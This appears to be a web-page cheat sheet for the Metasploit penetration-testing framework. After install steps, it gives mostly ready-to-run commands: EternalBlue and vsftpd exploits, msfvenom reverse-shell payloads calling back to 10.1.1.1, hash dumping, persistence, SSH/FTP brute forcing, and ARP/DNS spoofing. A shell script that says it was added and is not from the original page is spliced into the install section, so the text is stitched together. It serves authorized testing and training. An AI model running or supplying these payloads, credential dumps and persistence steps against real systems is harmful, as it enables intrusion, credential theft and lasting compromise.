Metasploit

Metasploit is a widely used security tool for penetration testing, vulnerability scanning, and exploit development. It helps security professionals identify weaknesses, automate attacks, and validate defenses, making it an essential asset for both offensive and defensive cybersecurity strategies.
Navigation
  • Installation and Setup
  • Exploit Commands
  • Payload Generation
  • Post-Exploitation
  • Session Management
  • Brute Force and Password Cracking
  • Network Attacks
  • Service Enumeration
  • Web Application Exploitation
  • Privilege Escalation
  • Meterpreter Commands
  • Auxiliary Modules
  • Vulnerability Scanning and Information Gathering
  • Tunneling and Proxying

Installation and Setup

Installing the Metasploit Framework on Windows

  1. Download the Windows Installer.
  2. After downloading the installer, locate the file, right-click, and select Run as Administrator.
  3. When the Setup screen appears, click Next to continue.
  4. Read the license agreement and select the I accept the license agreement option. Click Next to continue.
  5. Browse to the location where you want to install the Metasploit Framework. By default, the framework is installed in the C:\metasploit-framework directory. Click Next to continue.
  6. Click Install.
  7. When the installation completes, click the Finish button.
  8. To launch msfconsole after the installation completes, run the following from the command line:
msfconsole.bat

Installing the Metasploit Framework on Linux

  1. Open the terminal.
  2. Enter the following command to add the build repository and install the Metasploit Framework package:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

  3. After the installation completes, open a terminal window and type the following to start msfconsole:
./msfconsole
  4. The prompt asks if you want to use and set up a new database. Type y or yes to run the configuration script that creates the initial database.
  5. To check whether the database was set up, run the following command:
db_status
  6. If the Metasploit Framework successfully connected to the database, the following status displays:
[*] postgresql connected to msf
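The prompt in step 4 and the manual db_status check in step 5 are interactive, which gets in the way when the install is scripted or repeated across lab machines. The script below is an added example, not part of the original page or of the Metasploit project: it assumes msfconsole is on PATH, uses msfconsole's real -q (quiet) and -x (run commands, then continue) options, and, as an assumption, accepts either the status wording shown in step 6 or the "Connected to msf. Connection type: postgresql." wording that newer releases print.

```shell
#!/bin/sh
# Added example (not from the page or the Metasploit project): verify that the
# Metasploit database is set up, without an interactive msfconsole session.
# Assumes msfconsole is on PATH; -q and -x are real msfconsole options.

# Classify one line of db_status output.
# Prints "connected" for "[*] postgresql connected to msf" (and, as an assumed
# variant, the newer "[*] Connected to msf. Connection type: postgresql."),
# and "disconnected" for anything else, e.g. "postgresql selected, no connection".
parse_db_status() {
  lower=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  case "$lower" in
    *"connected to msf"*) echo "connected" ;;
    *)                    echo "disconnected" ;;
  esac
}

# Run db_status in a quiet, non-interactive msfconsole and classify the result.
# Exit status: 0 = connected, 1 = not connected, 2 = msfconsole not installed.
check_msf_db() {
  command -v msfconsole >/dev/null 2>&1 || {
    echo "msfconsole not found in PATH" >&2
    return 2
  }
  line=$(msfconsole -q -x "db_status; exit" 2>/dev/null | grep -i 'connect' | head -n 1)
  [ "$(parse_db_status "$line")" = "connected" ]
}

# The live check only runs when invoked as: sh verify_msf_db.sh --check
if [ "${1:-}" = "--check" ]; then
  if check_msf_db; then
    echo "Metasploit database: connected"
  else
    echo "Metasploit database: not connected (try: msfdb init, then msfconsole -x db_status)"
    exit 1
  fi
fi
```

Run it as `sh verify_msf_db.sh --check` after step 2; a non-zero exit means either the database was never initialised (run msfdb init) or msfconsole is not on PATH.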

Running, Connecting and Updating

msfconsole                                                      #Start the Metasploit Console
msfvenom -h                                                     #Display msfvenom Help
msfdb init                                                      #Initialize Metasploit Database
msfconsole -x "db_connect user:password@localhost/metasploit"   #Connect to Metasploit Database
msfupdate                                                       #Update Metasploit Framework

Exploit Commands

use exploit/windows/smb/ms17_010_eternalblue   #Select Exploit (EternalBlue Example)
use exploit/unix/ftp/vsftpd_234_backdoor       #Select Exploit (vsftpd Example)
search type:exploit                            #Search for exploit modules (type: filters by module type)
show exploits                                  #Show all available exploits
set RHOSTS 10.1.1.1                            #Set Remote Host
set RPORT 445                                  #Set Remote Port
set PAYLOAD windows/meterpreter/reverse_tcp    #Set Payload
exploit                                        #Run Exploit
run                                            #Run Exploit
exploit -j -z                                  #Run exploit in the background (jobs mode)

Payload Generation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe       #Create Windows Reverse TCP Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f elf > payload.elf           #Create Linux Reverse TCP Payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f raw > payload.php           #Create PHP Reverse TCP Payload
msfvenom -p windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe     #Create Reverse HTTPS Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe   #Create x64 Payload

Post-Exploitation

sessions -l                                       #List all active sessions
sessions -i 1                                     #Interact with session 1
sysinfo                                           #Get System Information
getuid                                            #Get current user ID
hashdump                                          #Dump Windows Hashes
migrate 1234                                      #Migrate to process ID 1234
run persistence -U -X -i 5 -p 4444 -r 10.1.1.1    #Set up persistence

Session Management

sessions -i 1               #Interact with session 1
sessions -k 1               #Kill session 1
sessions -l                 #List all sessions
sessions -v                 #List all sessions with verbose details
background                  #Send session to background
exit                        #Exit the current session

Brute Force and Password Cracking

use auxiliary/scanner/ssh/ssh_login          #SSH Brute Force Scanner
set RHOSTS 10.1.1.1                          #Set target host
set USER_FILE /path/to/usernames.txt         #Set file with usernames
set PASS_FILE /path/to/passwords.txt         #Set file with passwords
run                                          #Run Brute Force Attack

use auxiliary/scanner/ftp/ftp_login          #FTP Brute Force Scanner
set RHOSTS 10.1.1.1                          #Set target host
set USER_FILE /path/to/usernames.txt         #Set file with usernames
set PASS_FILE /path/to/passwords.txt         #Set file with passwords
run                                          #Run FTP Brute Force Attack

Network Attacks

use auxiliary/spoof/dns/forwarder           #DNS Spoofing
set RHOSTS 10.1.1.1                         #Set target host
set LHOST 10.1.1.1                          #Set local host
run                                         #Run DNS Spoofing

use auxiliary/spoof/arp/arp_poisoning       #ARP Spoofing
set RHOSTS 10.1.1.1                         #Set target host
set INTERFACE eth0                          #Set Network Interface
run                                         #Run ARP Spoofing

Service Enumeration

use auxiliary/scanner/smb/smb_version       #SMB Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run SMB version scan

use auxiliary/scanner/ftp/ftp_version       #FTP Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run FTP version scan

use auxiliary/scanner/ssh/ssh_version       #SSH Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run SSH version scan

Web Application Exploitation

use exploit/unix/webapp/php_cgi_arg_injection   #PHP CGI Argument Injection Exploit
set RHOSTS 10.1.1.1                             #Set target host
set RPORT 80                                    #Set target port
run                                             #Run Exploit

use auxiliary/scanner/http/dir_scanner          #Directory Bruteforce Scanner
set RHOSTS 10.1.1.1                             #Set target host
set DICTIONARY /path/to/wordlist                #Set wordlist for directories
run                                             #Run Brute Force Directory Scanner

Privilege Escalation

use post/multi/recon/local_exploit_suggester   #Suggest Exploits for Privilege Escalation
set SESSION 1                                  #Set session ID
run                                            #Run the exploit suggestion

use post/windows/gather/enum_tokens            #Gather tokens for privilege escalation
set SESSION 1                                  #Set session ID
run                                            #Run token enumeration

Meterpreter Commands

sysinfo                                              #Get system information
getuid                                               #Get current user ID
upload /path/to/file /tmp/                           #Upload a file to the target system
download /tmp/file /path/to/save/                    #Download a file from the target system
run persistence -U -X -i 5 -p 4444 -r 10.1.1.1       #Set up persistence
shell                                                #Drop into a system shell

Auxiliary Modules

use auxiliary/scanner/portscan/tcp           #TCP Port Scanner
set RHOSTS 10.1.1.1                          #Set target host
set THREADS 10                               #Set number of threads
run                                          #Run Port Scan

use auxiliary/scanner/smb/smb_enumshares     #SMB Share Enumeration
set RHOSTS 10.1.1.1                          #Set target host
run                                          #Run SMB Share Enumeration

Vulnerability Scanning and Information Gathering

use auxiliary/scanner/http/dir_scanner                #Directory Scanner
set RHOSTS 10.1.1.1                                   #Set target host
set DICTIONARY /usr/share/wordlists/dirb/common.txt   #Set directory wordlist
run                                                   #Run Directory scan

use auxiliary/scanner/ssl/ssl_version            #SSL Version Enumeration
set RHOSTS 10.1.1.1                              #Set target host
run                                              #Run SSL scan

Tunneling and Proxying

use auxiliary/server/socks_proxy            #Start SOCKS Proxy
set SRVPORT 1080                            #Set proxy port
run                                         #Run proxy server

use auxiliary/server/http_proxy             #Start HTTP Proxy
set SRVPORT 8080                            #Set HTTP proxy port
run                                         #Run HTTP proxy server